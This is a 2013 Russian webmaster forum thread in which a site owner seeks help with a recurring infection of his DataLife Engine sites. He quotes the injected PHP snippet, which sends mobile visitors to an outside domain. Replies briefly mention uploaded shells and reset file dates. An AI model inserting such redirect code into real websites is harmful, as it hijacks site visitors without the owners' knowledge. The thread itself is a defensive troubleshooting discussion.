Перейти к содержимому


× Быстрый вопрос
Пользователь месяца
dos1k dos1k 1-й за Май
Очков активности: 1 194 28 тем, 115 сообщений, 4 балла репутации
Сайт: dos1k.ru
ТОП самых активных за этот месяц
  • Фотография Olya23
    #1

    Olya23
    Очков активности: 990 3 темы, 123 сообщения, 5 баллов репутации

  • Фотография Rodiola
    #2

    Rodiola (rukodelkovo.ru)
    Очков активности: 684 0 тем, 76 сообщений, 6 баллов репутации

  • Фотография maxnik
    #3

    maxnik (konovalovpavel.ru)
    Очков активности: 90 0 тем, 20 сообщений, 3 балла репутации

  • Фотография agrx
    #4

    agrx (key-assort.ru)
    Очков активности: 54 0 тем, 18 сообщений, 2 балла репутации

  • Фотография fedornabilkin
    #5

    fedornabilkin (plohoneponyal.ru)
    Очков активности: 51 0 тем, 17 сообщений, 2 балла репутации

  • Фотография BLIK
    #6

    BLIK
    Очков активности: 49.5 Вне конкурса за определение пользователя месяца

  • Фотография Андрей WPMasterKZ
    #7

    Андрей WPMasterKZ (wpmaster.kz)
    Очков активности: 37.5 0 тем, 25 сообщений, 1 балл репутации

  • Фотография re-search
    #8

    re-search
    Очков активности: 36 5 тем, 9 сообщений, 1 балл репутации

  • Фотография FIvYUr
    #9

    FIvYUr (catblogger.ru)
    Очков активности: 36 0 тем, 24 сообщения, 1 балл репутации

  • Фотография Ixman
    #10

    Ixman (o5cat.ru)
    Очков активности: 27 0 тем, 9 сообщений, 2 балла репутации

  • Показать весь ТОП 10
Поддержите форум! =)
Апдейты
  • Яндекс ИКС: 24.05.2019
  • Яндекс выдача: 19.06.2019
Топ 5 участников по репутации


Вредоносный код на Dle

#1 ecotraid

ecotraid
  • Неактивные
  • 3 сообщений
  • Репутация: 0
0

Отправлено 10 Февраль 2013 - 14:33

Здравствуйте! С недавнего времени на мои сайты на разных хостингах начал прописываться код в следующих файлах: /index.php, /engine/init.php, /engine/engine.php, /engine/data/config.php и /language/Russian/website.lng следующего содержания:
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");
if ($iphone || $android || $palmpre || $ipod || $berry === true) {
	header('Location: http://statuses.ws/');
}

Доступ по FTP закрыл, пароли менял, доступ в isp manager по статичному ip. Но все равно через несколько часов появляется!
Перестал появлятся когда поставил на эти файлы права 444 .

Кто знает как и где искать уязвимость? Сайты на VDS.
Спасибо.

 

 

  • 0

#2 Agriiii

Agriiii
  • Неактивные
  • 378 сообщений
  • Репутация: 40

Отправлено 10 Февраль 2013 - 14:45

Если нет врага снаружи - то ищи его внутри. Если файлы ты закрыл - значит бяка изнутри их портит. Соседняя тема про JS говорит, может они заражены.
  • 1

#3 ecotraid

ecotraid
    Topic Starter
  • Неактивные
  • 3 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2013 - 15:44

Сейчас просмотрел все файлы на дату изменения - ничего, все кроме этих менялись еще полгода назад. Что интересно сайты на разных VDS (3) - наверно все таки через комп как то. Стоит KIS 2013 лицензия.

Вот вроде бы решение, кому интересно: взлом-dle-загрузкой-аватара-с-вредоносны

Блин, оказывается это массовый взлом DLE ...

Сообщение отредактировал ecotraid: 10 Февраль 2013 - 20:03

  • 0

#4 g00dboy

g00dboy
  • Неактивные
  • 24 сообщений
  • Репутация: 3

Отправлено 08 Март 2013 - 23:53

Сейчас просмотрел все файлы на дату изменения - ничего, все кроме этих менялись еще полгода назад.

залил шелл и поменял дату изменения = профит


Что интересно сайты на разных VDS (3) - наверно все таки через комп как то. Стоит KIS 2013 лицензия.

один взломали и получили доступ ко всей ФС
  • 0

#5 trustreg

trustreg
  • Неактивные
  • 4 сообщений
  • Репутация: 1

Отправлено 14 Март 2013 - 02:22

Проверь JS файлы. Наверное шаблон паблик..
Такое часто и у меня бывает ))
  • 0



Похожие темы

  Название темы Автор Статистика Последнее сообщение

Оформление форума – IPBSkins.ru